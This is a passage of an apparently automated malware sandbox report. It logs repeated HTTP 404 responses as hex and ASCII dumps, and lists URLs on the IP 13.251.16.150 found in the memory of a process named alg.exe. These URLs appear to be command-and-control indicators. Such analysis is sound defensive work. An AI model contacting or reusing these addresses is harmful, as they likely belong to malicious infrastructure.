                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:42 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:42 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Tue, 05 Nov 2024 16:04:03 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Tue, 05 Nov 2024 16:04:11 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:04:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:04:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:04:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:04:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: alg.exe, 00000005.00000003.2406699561.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2726508164.00000000004BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
                        Source: alg.exe, 00000005.00000003.2406699561.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/(UF
                        Source: alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/4
                        Source: alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/7
                        Source: alg.exe, 00000005.00000003.2538471760.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2530063854.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/F
                        Source: alg.exe, 00000005.00000003.2406458559.000000000048D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/b
                        Source: alg.exe, 00000005.00000003.2421364608.0000000000436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/b;:
                        Source: alg.exe, 00000005.00000003.2406458559.000000000048D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/bA
                        Source: alg.exe, 00000005.00000003.2406699561.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/bs
                        Source: alg.exe, 00000005.00000003.2744437728.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/ghraajhdo
